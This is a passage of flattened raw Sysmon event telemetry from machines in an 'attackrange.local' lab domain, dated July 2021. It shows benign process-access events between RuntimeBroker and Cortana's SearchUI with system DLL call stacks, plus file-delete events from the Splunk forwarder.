dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x80000000000000001053748Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:35.647{466BC892-32D3-60E8-6F0B-00000000CF01}70767684C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x80000000000000001053747Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:35.647{466BC892-32D3-60E8-6F0B-00000000CF01}70767684C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x80000000000000001053746Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:35.647{466BC892-32D3-60E8-6F0B-00000000CF01}70763308C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x80000000000000001053745Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:35.647{466BC892-32D3-60E8-6F0B-00000000CF01}70763308C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde 10341000x80000000000000001053744Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:35.647{466BC892-32D3-60E8-6F0B-00000000CF01}70767684C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x80000000000000001053743Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:35.647{466BC892-32D3-60E8-6F0B-00000000CF01}70767684C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde 10341000x80000000000000001053742Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:35.647{466BC892-32D3-60E8-6F0B-00000000CF01}70763308C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+26297|C:\Windows\system32\windows.cortana.Desktop.dll+214fb|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x80000000000000001053741Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:35.647{466BC892-32D3-60E8-6F0B-00000000CF01}70763308C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+21491|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x80000000000000001053740Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:35.632{466BC892-32D3-60E8-6F0B-00000000CF01}70763308C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x80000000000000001053739Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:35.632{466BC892-32D3-60E8-6F0B-00000000CF01}70763308C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde 23542300x80000000000000001053738Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:35.230{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=74A59189D89629A0EE1659F4027792B4,SHA256=63EC71BE4B6DF1B045EDD4D8EFA9601CC7E067F534ABB00989DB700E522CD200,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810015Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:36.839{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=745E6C55503A9B9E6235904669D22D17,SHA256=A3066B392CA2606A43ACA84A25CB1DF5FC8AE8407C0DB546B4B2DF57BA1DECBD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053766Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:36.878{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=24A241B20B2D179E219A82528A6495F0,SHA256=F4EA25498A178608A280E0792961155EFFDFEDA478874B8D28B55D35CF6CD899,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053765Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:36.878{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=77A5CEE91F4AFA9075D84874E4AA4E89,SHA256=45F733FE3BDB128BBB98AE4E594CF833C4C67AFFA3D86010120E00A851936CCA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053764Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:36.379{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E2B3E5D39F7FB84626630B7C407BE24D,SHA256=FDC79B63321F09079EB0652C648E4A47D21024E9769BFD9C1EE24D0E74E9DD5F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810017Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:37.855{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8296B7E3BB75282C6B9D5D59501D2913,SHA256=851572574A6E161B509CDB9707013884DBE36C0AA53E494E08F8DD89390C9C2C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001053826Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:37.926{466BC892-32D3-60E8-6F0B-00000000CF01}70762764C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\System32\windows.storage.dll+9f28d|C:\Windows\System32\windows.storage.dll+6e886|C:\Windows\System32\windows.storage.dll+701e8|C:\Windows\system32\windows.cortana.Desktop.dll+f6ca|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+3d38b|C:\Windows\System32\combase.dll+3e7b2|C:\Windows\System32\combase.dll+63ae3|C:\Windows\System32\combase.dll+3e8cd|C:\Windows\System32\combase.dll+61e6f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x80000000000000001053825Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:37.926{466BC892-32D3-60E8-6F0B-00000000CF01}70762764C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\System32\windows.storage.dll+9f28d|C:\Windows\System32\windows.storage.dll+a1970|C:\Windows\System32\windows.storage.dll+d3034|C:\Windows\System32\windows.storage.dll+d072b|C:\Windows\system32\windows.cortana.Desktop.dll+f61e|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+3d38b|C:\Windows\System32\combase.dll+3e7b2|C:\Windows\System32\combase.dll+63ae3|C:\Windows\System32\combase.dll+3e8cd|C:\Windows\System32\combase.dll+61e6f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000001053824Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:37.875{466BC892-32D3-60E8-6F0B-00000000CF01}70767684C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x80000000000000001053823Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:37.875{466BC892-32D3-60E8-6F0B-00000000CF01}70767684C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x80000000000000001053822Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:37.875{466BC892-32D3-60E8-6F0B-00000000CF01}70768900C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1528d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11c9a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001053821Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:37.875{466BC892-32D3-60E8-6F0B-00000000CF01}70768900C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15171|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11c9a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053820Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:05:37.875{466BC892-32D3-60E8-6F0B-00000000CF01}70768900C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15084|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11c9a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053819Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
